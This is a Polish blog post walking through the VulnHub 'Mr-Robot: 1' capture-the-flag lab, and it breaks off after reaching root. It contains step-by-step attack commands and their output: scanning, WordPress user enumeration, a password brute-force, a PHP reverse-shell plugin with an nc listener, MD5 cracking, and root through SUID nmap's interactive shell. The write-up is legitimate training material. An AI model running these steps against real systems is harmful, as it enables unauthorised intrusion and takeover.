{"id":35,"date":"2019-08-07T20:10:47","date_gmt":"2019-08-07T20:10:47","guid":{"rendered":"http:\/\/www.linuxsystems.ovh\/?p=35"},"modified":"2020-05-25T16:29:43","modified_gmt":"2020-05-25T16:29:43","slug":"vulnhub-mr-robot-1","status":"publish","type":"post","link":"https:\/\/www.linuxsystems.ovh\/?p=35","title":{"rendered":"Vulnhub: Mr-Robot: 1"},"content":{"rendered":"\n<p>Dzisiaj zaprezentuj\u0119 wam jak uzyska\u0107 wszystkie 3 klucze z obrazu Mr-Robot: 1 dost\u0119pnego tutaj: <a href=\"https:\/\/www.vulnhub.com\/entry\/mr-robot-1,151\/\">https:\/\/www.vulnhub.com\/entry\/mr-robot-1,151\/<\/a> , a wi\u0119c do dzie\u0142a \ud83d\ude42<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>co\n to sprawdzamy jaki ma IP nasza virtualka, wiem tylko tyle, \u017ce w mojej \nsieci dostanie IP z klasy 192.168.1.0\/24, a wi\u0119c uruchamiamy:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>netdiscover -r 192.168.1.0\/24<\/p><\/blockquote>\n\n\n\n<p>Uzyskamy taki wynik:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ netdiscover -r 192.168.1.0\/24<br>Currently scanning: Finished! | Screen View: Unique Hosts <br>22 Captured ARP Req\/Rep packets, from 11 hosts. Total size: 1324<br>_____________________________________________________________________________<br> IP At MAC Address Count Len MAC Vendor \/ Hostname <br> \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 &#8211;<br>[\u2026]<br> 192.168.1.165 08:00:27:10:7f:e3 2 120 PCS Systemtechnik GmbH <br>[\u2026]<\/p><\/blockquote>\n\n\n\n<p>Adres IP by\u0107 inny, gdy\u017c jest on pobierany z DHCP \ud83d\ude42<\/p>\n\n\n\n<p>nast\u0119pnie skanuj\u0119 go nmap`em:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ nmap 192.168.1.165<br>Starting Nmap 7.70 ( <a href=\"https:\/\/nmap.org\">https:\/\/nmap.org<\/a> ) at 2019\u201307\u201306 19:00 CEST<br>Nmap scan report for linux.localdomain (192.168.1.165)<br>Host is up (0.00018s latency).<br>Not shown: 997 filtered ports<br>PORT STATE SERVICE<br>22\/tcp closed ssh<br>80\/tcp open http<br>443\/tcp open https<br>MAC Address: 08:00:27:10:7F:E3 (Oracle VirtualBox virtual NIC)<\/p><p>Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds<\/p><\/blockquote>\n\n\n\n<p>Jak widzimy jest otwarty port SSH\/HTTP\/HTTPS zobaczmy wi\u0119c co jest na tej stronie:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"156\" src=\"https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln1.png\" alt=\"\" class=\"wp-image-36\" srcset=\"https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln1.png 700w, https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln1-300x67.png 300w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>Nic ciekawego wi\u0119c pu\u015b\u0107my dirb z opcj\u0105 big.txt:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ dirb <a href=\"http:\/\/192.168.1.165\/\">http:\/\/192.168.1.165\/<\/a> -w \/usr\/share\/wordlists\/dirb\/big.txt<\/p><\/blockquote>\n\n\n\n<p>a za ten czas zobaczmy czy nie ma czasami pliku robots.txt:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ curl <a href=\"http:\/\/192.168.1.165\/robots.txt\">http:\/\/192.168.1.165\/robots.txt<\/a><br>User-agent: *<br>fsocity.dic<br>key-1-of-3.txt<\/p><\/blockquote>\n\n\n\n<p>Widzimy plik key-1-of-3.txt sprawd\u017amy go:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>curl <a href=\"http:\/\/192.168.1.165\/key-1-of-3.txt\">http:\/\/192.168.1.165\/key-1-of-3.txt<\/a><br>073403c8a58a1f80d943455fb30724b9<\/p><\/blockquote>\n\n\n\n<p>Tym oto sposobem uzyskali\u015bmy 1 klucz z tej wirtualki \ud83d\ude42 gratuluj\u0119 \ud83d\ude42<\/p>\n\n\n\n<p>Wracamy do wynik\u00f3w dirb`a:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ dirb <a href=\"http:\/\/192.168.1.165\/\">http:\/\/192.168.1.165\/<\/a> -w \/usr\/share\/wordlists\/dirb\/big.txt<br>\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 &#8211;<br>DIRB v2.22 <br>By The Dark Raver<br> \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 &#8211;<\/p><p>START_TIME: Sat Jul 6 18:54:35 2019<br>URL_BASE: <a href=\"http:\/\/192.168.1.165\/\">http:\/\/192.168.1.165\/<\/a><br>WORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt<br>OPTION: Not Stopping on warning messages<\/p><p>\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 &#8211;<br>GENERATED WORDS: 4612<br> \u2014 \u2014 Scanning URL: <a href=\"http:\/\/192.168.1.165\/\">http:\/\/192.168.1.165\/<\/a> \u2014 \u2014 <br>==&gt; DIRECTORY: <a href=\"http:\/\/192.168.1.165\/0\/\">http:\/\/192.168.1.165\/0\/<\/a> <br>==&gt; DIRECTORY: <a href=\"http:\/\/192.168.1.165\/admin\/\">http:\/\/192.168.1.165\/admin\/<\/a> <br>+ <a href=\"http:\/\/192.168.1.165\/atom\">http:\/\/192.168.1.165\/atom<\/a> (CODE:301|SIZE:0) <br>==&gt; DIRECTORY: <a href=\"http:\/\/192.168.1.165\/audio\/\">http:\/\/192.168.1.165\/audio\/<\/a> <br>^C<\/p><\/blockquote>\n\n\n\n<p>i zauwa\u017camy \u015bcie\u017ck\u0119 \/0\/, wi\u0119c pr\u00f3bujemy zobaczy\u0107 co tam jest:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"358\" src=\"https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln2.png\" alt=\"\" class=\"wp-image-37\" srcset=\"https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln2.png 700w, https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln2-300x153.png 300w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>Ukazuje nam si\u0119 popularny CMS wordpress \ud83d\ude42<\/p>\n\n\n\n<p>Uruchamiamy wi\u0119c wp-scan:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>wpscan \u2014 url <a href=\"http:\/\/192.168.1.165\/0\">http:\/\/192.168.1.165\/0<\/a> -e u<br>_______________________________________________________________<br> __ _______ _____<br> \\ \\ \/ \/ __ \\ \/ ____|<br> \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae<br> \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | \u2018_ \\<br> \\ \/\\ \/ | | ____) | (__| (_| | | | |<br> \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|<\/p><p>WordPress Security Scanner by the WPScan Team<br> Version 3.5.4<br> Sponsored by Sucuri \u2014 <a href=\"https:\/\/sucuri.net\">https:\/\/sucuri.net<\/a><br> <a href=\"http:\/\/twitter.com\/_WPScan_\">@_WPScan_<\/a>, <a href=\"http:\/\/twitter.com\/ethicalhack3r\">@ethicalhack3r<\/a>, <a href=\"http:\/\/twitter.com\/erwan_lr\">@erwan_lr<\/a>, <a href=\"http:\/\/twitter.com\/_FireFart_\">@_FireFart_<\/a><br>_______________________________________________________________<\/p><p>Scan\n Aborted: Unable to identify the wp-content dir, please supply it with \u2014\n wp-content-dir, use the \u2014 scope option or make sure the \u2014 url value \ngiven is the correct one<\/p><\/blockquote>\n\n\n\n<p>niestety jest b\u0142\u0105d, poniewa\u017c katalog wp-content nie jest w \/0\/wp-content , a w \/wp-content, a wi\u0119c dopisujemy:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ wpscan \u2014 url <a href=\"http:\/\/192.168.1.165\/0\">http:\/\/192.168.1.165\/0<\/a> -e u \u2014 wp-content-dir wp-content<br>_______________________________________________________________<br> __ _______ _____<br> \\ \\ \/ \/ __ \\ \/ ____|<br> \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae<br> \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | \u2018_ \\<br> \\ \/\\ \/ | | ____) | (__| (_| | | | |<br> \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|<\/p><p>WordPress Security Scanner by the WPScan Team<br> Version 3.5.4<br> Sponsored by Sucuri \u2014 <a href=\"https:\/\/sucuri.net\">https:\/\/sucuri.net<\/a><br> <a href=\"http:\/\/twitter.com\/_WPScan_\">@_WPScan_<\/a>, <a href=\"http:\/\/twitter.com\/ethicalhack3r\">@ethicalhack3r<\/a>, <a href=\"http:\/\/twitter.com\/erwan_lr\">@erwan_lr<\/a>, <a href=\"http:\/\/twitter.com\/_FireFart_\">@_FireFart_<\/a><br>_______________________________________________________________<\/p><p>[+] URL: <a href=\"http:\/\/192.168.1.165\/0\/\">http:\/\/192.168.1.165\/0\/<\/a><br>[+] Started: Sat Jul 6 19:11:45 2019<\/p><p>Interesting Finding(s):<\/p><p>[+] <a href=\"http:\/\/192.168.1.165\/0\/\">http:\/\/192.168.1.165\/0\/<\/a><br> | Interesting Entries:<br> | \u2014 Server: Apache<br> | \u2014 X-Powered-By: PHP\/5.5.29<br> | \u2014 X-Mod-Pagespeed: 1.9.32.3\u20134523<br> | Found By: Headers (Passive Detection)<br> | Confidence: 100%<\/p><p>[+] <a href=\"http:\/\/192.168.1.165\/xmlrpc.php\">http:\/\/192.168.1.165\/xmlrpc.php<\/a><br> | Found By: Headers (Passive Detection)<br> | Confidence: 100%<br> | Confirmed By:<br> | \u2014 Link Tag (Passive Detection), 30% confidence<br> | \u2014 Direct Access (Aggressive Detection), 100% confidence<br> | References:<br> | \u2014 <a href=\"http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\">http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access<\/a><\/p><p>[+] WordPress version 4.3.19 identified (Latest, released on 2019\u201303\u201313).<br> | Detected By: Rss Generator (Passive Detection)<br> | \u2014 <a href=\"http:\/\/192.168.1.165\/feed\/\">http:\/\/192.168.1.165\/feed\/<\/a>, &lt;generator&gt;<a href=\"https:\/\/wordpress.org\/?v=4.3.19\">https:\/\/wordpress.org\/?v=4.3.19<\/a>&lt;\/generator&gt;<br> | \u2014 <a href=\"http:\/\/192.168.1.165\/comments\/feed\/\">http:\/\/192.168.1.165\/comments\/feed\/<\/a>, &lt;generator&gt;<a href=\"https:\/\/wordpress.org\/?v=4.3.19\">https:\/\/wordpress.org\/?v=4.3.19<\/a>&lt;\/generator&gt;<\/p><p>[i] The main theme could not be detected.<\/p><p>[+] Enumerating Users (via Passive and Aggressive Methods)<br>\n Brute Forcing Author IDs \u2014 Time: 00:00:00 \n&lt;================================================================================================================================&gt;\n (10 \/ 10) 100.00% Time: 00:00:00<\/p><p>[i] User(s) Identified:<\/p><p>[+] mich05654<br> | Detected By: Author Id Brute Forcing \u2014 Author Pattern (Aggressive Detection)<\/p><p>[+] elliot<br> | Detected By: Author Id Brute Forcing \u2014 Author Pattern (Aggressive Detection)<\/p><p>[+] Finished: Sat Jul 6 19:11:48 2019<br>[+] Requests Done: 45<br>[+] Cached Requests: 9<br>[+] Data Sent: 7.251 KB<br>[+] Data Received: 142.523 KB<br>[+] Memory used: 79.816 MB<br>[+] Elapsed time: 00:00:02<\/p><\/blockquote>\n\n\n\n<p>Ukazuj\u0105\n nam si\u0119 2 u\u017cytkownik\u00f3w: elliot, oraz mich05654\u2026 przypominamy sobie, \u017ce w\n pliku robots.txt by\u0142 tak\u017ce plik: fsocity.dic wi\u0119c pr\u00f3bujemy go pobra\u0107:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>wget <a href=\"http:\/\/192.168.1.165\/fsocity.dic\">http:\/\/192.168.1.165\/fsocity.dic<\/a><br> \u2014 2019\u201307\u201306 22:53:56 \u2014 <a href=\"http:\/\/192.168.1.165\/fsocity.dic\">http:\/\/192.168.1.165\/fsocity.dic<\/a><br>\u0141\u0105czenie si\u0119 z 192.168.1.165:80\u2026 po\u0142\u0105czono.<br>\u017b\u0105danie HTTP wys\u0142ano, oczekiwanie na odpowied\u017a\u2026 200 OK<br>D\u0142ugo\u015b\u0107: 7245381 (6,9M) [text\/x-c]<br>Zapis do: `fsocity.dic\u2019<\/p><p>fsocity.dic\n \n100%[=================================================================================================================&gt;]\n 6,91M 37,1MB\/s w 0,2s<\/p><p>2019\u201307\u201306 22:53:56 (37,1 MB\/s) \u2014 zapisano `fsocity.dic\u2019 [7245381\/7245381]<\/p><\/blockquote>\n\n\n\n<p>Sprawdzamy zawarto\u015b\u0107 tego pliku:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p># cat fsocity.dic | head -n 5<br>true<br>false<br>wikia<br>from<br>the<\/p><\/blockquote>\n\n\n\n<p>wygl\u0105da na jaki\u015b s\u0142ownik, a wi\u0119c pr\u00f3bujemy robi\u0107 brute-force tym s\u0142ownikiem u\u017cytkownika elliot:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ wpscan \u2014 url <a href=\"http:\/\/192.168.1.165\/0\">http:\/\/192.168.1.165\/0<\/a> \u2014 wp-content-dir wp-content -U elliot -P fsocity.dic<br>_______________________________________________________________<br> __ _______ _____<br> \\ \\ \/ \/ __ \\ \/ ____|<br> \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae<br> \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | \u2018_ \\<br> \\ \/\\ \/ | | ____) | (__| (_| | | | |<br> \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|<\/p><p>WordPress Security Scanner by the WPScan Team<br> Version 3.5.4<br> Sponsored by Sucuri \u2014 <a href=\"https:\/\/sucuri.net\">https:\/\/sucuri.net<\/a><br> <a href=\"http:\/\/twitter.com\/_WPScan_\">@_WPScan_<\/a>, <a href=\"http:\/\/twitter.com\/ethicalhack3r\">@ethicalhack3r<\/a>, <a href=\"http:\/\/twitter.com\/erwan_lr\">@erwan_lr<\/a>, <a href=\"http:\/\/twitter.com\/_FireFart_\">@_FireFart_<\/a><br>_______________________________________________________________<\/p><p>[+] URL: <a href=\"http:\/\/192.168.1.165\/0\/\">http:\/\/192.168.1.165\/0\/<\/a><br>[+] Started: Sat Jul 6 21:09:51 2019<\/p><p>Interesting Finding(s):<\/p><p>[+] <a href=\"http:\/\/192.168.1.165\/0\/\">http:\/\/192.168.1.165\/0\/<\/a><br> | Interesting Entries:<br> | \u2014 Server: Apache<br> | \u2014 X-Powered-By: PHP\/5.5.29<br> | \u2014 X-Mod-Pagespeed: 1.9.32.3\u20134523<br> | Found By: Headers (Passive Detection)<br> | Confidence: 100%<\/p><p>[+] <a href=\"http:\/\/192.168.1.165\/xmlrpc.php\">http:\/\/192.168.1.165\/xmlrpc.php<\/a><br> | Found By: Headers (Passive Detection)<br> | Confidence: 100%<br> | Confirmed By:<br> | \u2014 Link Tag (Passive Detection), 30% confidence<br> | \u2014 Direct Access (Aggressive Detection), 100% confidence<br> | References:<br> | \u2014 <a href=\"http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\">http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login<\/a><br> | \u2014 <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\">https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access<\/a><\/p><p>[+] WordPress version 4.3.19 identified (Latest, released on 2019\u201303\u201313).<br> | Detected By: Rss Generator (Passive Detection)<br> | \u2014 <a href=\"http:\/\/192.168.1.165\/feed\/\">http:\/\/192.168.1.165\/feed\/<\/a>, &lt;generator&gt;<a href=\"https:\/\/wordpress.org\/?v=4.3.19\">https:\/\/wordpress.org\/?v=4.3.19<\/a>&lt;\/generator&gt;<br> | \u2014 <a href=\"http:\/\/192.168.1.165\/comments\/feed\/\">http:\/\/192.168.1.165\/comments\/feed\/<\/a>, &lt;generator&gt;<a href=\"https:\/\/wordpress.org\/?v=4.3.19\">https:\/\/wordpress.org\/?v=4.3.19<\/a>&lt;\/generator&gt;<\/p><p>[i] The main theme could not be detected.<\/p><p>[+] Enumerating All Plugins (via Passive Methods)<\/p><p>[i] No plugins Found.<\/p><p>[+] Enumerating Config Backups (via Passive and Aggressive Methods)<br>\n Checking Config Backups \u2014 Time: 00:00:00 \n&lt;=================================================================================================================================&gt;\n (21 \/ 21) 100.00% Time: 00:00:00<\/p><p>[i] No Config Backups Found.<\/p><p>[+] Performing password attack on Xmlrpc Multicall against 1 user\/s<br>Progress\n Time: 00:34:36 \n&lt;===============================================================================================================================================&gt;\n (1716 \/ 1716) 100.00% Time: 00:34:36<br>WARNING: Your progress bar is \ncurrently at 1716 out of 1716 and cannot be incremented. In v2.0.0 this \nwill become a ProgressBar::InvalidProgressError.<br>Progress Time: \n00:34:36 \n&lt;===============================================================================================================================================&gt;\n (1716 \/ 1716) 100.00% Time: 00:34:36<br>[SUCCESS] \u2014<strong> elliot \/ ER28\u20130652 <\/strong><br>All Found<\/p><p>[i] Valid Combinations Found:<br> | Username: elliot, Password: ER28\u20130652<\/p><p>[+] Finished: Sat Jul 6 21:44:30 2019<br>[+] Requests Done: 1761<br>[+] Cached Requests: 7<br>[+] Data Sent: 414.387 KB<br>[+] Data Received: 175.93 MB<br>[+] Memory used: 360.078 MB<br>[+] Elapsed time: 00:34:38<\/p><\/blockquote>\n\n\n\n<p>I zosta\u0142o znalezione has\u0142o \ud83d\ude00 login to: <strong>elliot<\/strong> has\u0142o to: <strong>ER28\u20130652, <\/strong>wi\u0119c przechodzimy do <a href=\"http:\/\/192.168.1.165\/wp-admin\">http:\/\/192.168.1.165\/wp-admin<\/a> i logujemy si\u0119 powy\u017cej podanymi danymi i\u2026 widzimy panel wordpressa\u2026<\/p>\n\n\n\n<p>Pr\u00f3bujemy doda\u0107 w\u0142asny plugin z reverse shell, a wi\u0119c przechodzimy do zak\u0142adki Plugins -&gt; Add New<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"385\" src=\"https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln3.png\" alt=\"\" class=\"wp-image-38\" srcset=\"https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln3.png 700w, https:\/\/www.linuxsystems.ovh\/wp-content\/uploads\/2019\/08\/vuln3-300x165.png 300w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>i naciskamy przycisk Upload Plugin.<\/p>\n\n\n\n<p>Teraz przygotowywujemy sobie plugin do wordpressa.<\/p>\n\n\n\n<p>Pobieramy z tego gita: <a href=\"https:\/\/github.com\/pentestmonkey\/php-reverse-shell\">https:\/\/github.com\/pentestmonkey\/php-reverse-shell<\/a> plik o nazwie: <a href=\"https:\/\/github.com\/pentestmonkey\/php-reverse-shell\/blob\/master\/php-reverse-shell.php\">php-reverse-shell.php<\/a> i go delikatnie przerabiamy. Mianowicie na samym pocz\u0105tku tego pliku zaraz po &lt;?php dodajemy:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>\/*<br>Plugin Name: BlackRoomSec\u2019s Evil Reverse Shell<br>Plugin URI: <a href=\"https:\/\/www.blackroomsec.com\">https:\/\/www.blackroomsec.com<\/a><br>Description: Gets Tara into your cybers, duh!<br>Version: 1.0 baby<br>Author: BRS<br>Author URI: <a href=\"http:\/\/www.blackroomsec.com\">http:\/\/www.blackroomsec.com<\/a><br>Text Domain: evil-shell<br>Domain Path: \/languages<br>*\/<\/p><\/blockquote>\n\n\n\n<p>Oraz kilka linijek p\u00f3\u017aniej zmieniamy:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ip = \u2018127.0.0.1\u2019; \/\/ CHANGE THIS<\/p><\/blockquote>\n\n\n\n<p>pakujemy ten plik w zip:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ zip plugin.zip php-reverse-shell.php <br> adding: php-reverse-shell.php (deflated 58%)<\/p><\/blockquote>\n\n\n\n<p>i nast\u0119pnie plik <strong>plugin.zip<\/strong>\n wysy\u0142amy na serwer, jak ka\u017cdy inny plugin wordpressa \ud83d\ude42 . Zanim jednak \nklikniemy Activate Plugin, uruchamiamy program, kt\u00f3ry nas\u0142uchuje na \nporcie 1234 na naszym komputerze\/laptopie:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>nc -lvp 1234<\/p><\/blockquote>\n\n\n\n<p>Klikamy activate plugin i naszym oczom ukazuje si\u0119:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ nc -lvp 1234<br>Ncat: Version 7.70 ( <a href=\"https:\/\/nmap.org\/ncat\">https:\/\/nmap.org\/ncat<\/a> )<br>Ncat: Listening on :::1234<br>Ncat: Listening on 0.0.0.0:1234<br>Ncat: Connection from 192.168.1.165.<br>Ncat: Connection from 192.168.1.165:42530.<br>Linux linux 3.13.0\u201355-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU\/Linux<br> 20:27:45 up 3:37, 0 users, load average: 0.00, 0.01, 0.10<br>USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br>uid=1(daemon) gid=1(daemon) groups=1(daemon)<br>\/bin\/sh: 0: can\u2019t access tty; job control turned off<br>$<\/p><\/blockquote>\n\n\n\n<p>wpisuj\u0105c polecenie <strong>id<\/strong> widzimy, \u017ce jeste\u015bmy zalogowani jako:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>uid=1(daemon) gid=1(daemon) groups=1(daemon)<\/p><\/blockquote>\n\n\n\n<p>Poprawiamy sobie \u201cwygl\u0105d terminala\u201d na \/bin\/bash poleceniem:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>python -c \u201cimport pty;pty.spawn(\u2018\/bin\/bash\u2019)\u201d<\/p><\/blockquote>\n\n\n\n<p>przechodzimy do katalogu \/home\/robot:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>cd \/home\/robot<\/p><\/blockquote>\n\n\n\n<p>i listujemy pliki:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ ls -l<br>ls -l<br>total 8<br>-r \u2014 \u2014 \u2014 \u2014 1 robot robot 33 Nov 13 2015 key-2-of-3.txt<br>-rw-r \u2014 r \u2014 1 robot robot 39 Nov 13 2015 password.raw-md5<br>daemon@linux:\/home\/robot$ cat key-2-of-3.txt<br>cat key-2-of-3.txt<br>cat: key-2-of-3.txt: Permission denied<br>daemon@linux:\/home\/robot$ cat password.raw-md5<br>cat password.raw-md5<br>robot:c3fcd3d76192e4007dfb496cca67e13b<\/p><\/blockquote>\n\n\n\n<p>Jak\n widzimy nie umiemy jeszcze odczyta\u0107 klucza key-2-of-3.txt, ale za to \numiemy odczyta\u0107 plik password.raw-md5, wi\u0119c wchodzimy na stron\u0119:<a href=\"https:\/\/md5hashing.net\/?source=post_page---------------------------\">MD5HashingUltimate Hashing and Anonymity toolkitmd5hashing.net<\/a><\/p>\n\n\n\n<p>i pr\u00f3bujemy zdecryptowa\u0107 algorytm md5.<br>udaje nam si\u0119 to i dostajemy wynik: <strong>abcdefghijklmnopqrstuvwxyz<\/strong><\/p>\n\n\n\n<p>Pr\u00f3bujemy si\u0119 zalogowa\u0107 jako user robot:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ su \u2014 robot<br>su \u2014 robot<br>Password: abcdefghijklmnopqrstuvwxyz<\/p><\/blockquote>\n\n\n\n<p>i udaje nam si\u0119 zalogowa\u0107 jeste\u015bmy jako user robot, wi\u0119c odczytujemy plik key-2-of-3.txt:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ cat key-2-of-3.txt<br>cat key-2-of-3.txt<br>822c73956184f694993bede3eb39f959<\/p><\/blockquote>\n\n\n\n<p>Szukamy programu, dzi\u0119ki kt\u00f3rym mo\u017cliwa b\u0119dzie eskalacja uprawnie\u0144 do root:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>find \/ -user root -perm -4000 -print<br>find \/ -user root -perm -4000 -print<br>\/bin\/ping<br>\/bin\/umount<br>\/bin\/mount<br>\/bin\/ping6<br>\/bin\/su<br>find: `\/etc\/ssl\/private\u2019: Permission denied<br>\/usr\/bin\/passwd<br>\/usr\/bin\/newgrp<br>\/usr\/bin\/chsh<br>\/usr\/bin\/chfn<br>\/usr\/bin\/gpasswd<br>\/usr\/bin\/sudo<br>\/usr\/local\/bin\/nmap<\/p><\/blockquote>\n\n\n\n<p>Zauwa\u017camy, \u017ce jest program nmap, kt\u00f3ry pozwala nam na eskalacj\u0119 uprawnie\u0144 do roota: <a href=\"https:\/\/pentestlab.blog\/category\/privilege-escalation\/\">https:\/\/pentestlab.blog\/category\/privilege-escalation\/<\/a><\/p>\n\n\n\n<p>a wi\u0119c uruchamiamy go:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>$ nmap \u2014 interactive<br>nmap \u2014 interactive<\/p><p>Starting nmap V. 3.81 ( <a href=\"http:\/\/www.insecure.org\/nmap\/\">http:\/\/www.insecure.org\/nmap\/<\/a> )<br>Welcome to Interactive Mode \u2014 press h &lt;enter&gt; for help<br>nmap&gt; !sh<br>!sh<br># id<br>id<br>uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)<br>#<\/p><\/blockquote>\n\n\n\n<p>i ju\u017c jeste\u015bmy jako root \ud83d\ude42<\/p>\n\n\n\n<p>nast\u0119pnie przechodzimy do katalogu \/root i patrzymy jakie ma pliki:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p># cd \/root<br>cd \/root<br># ls 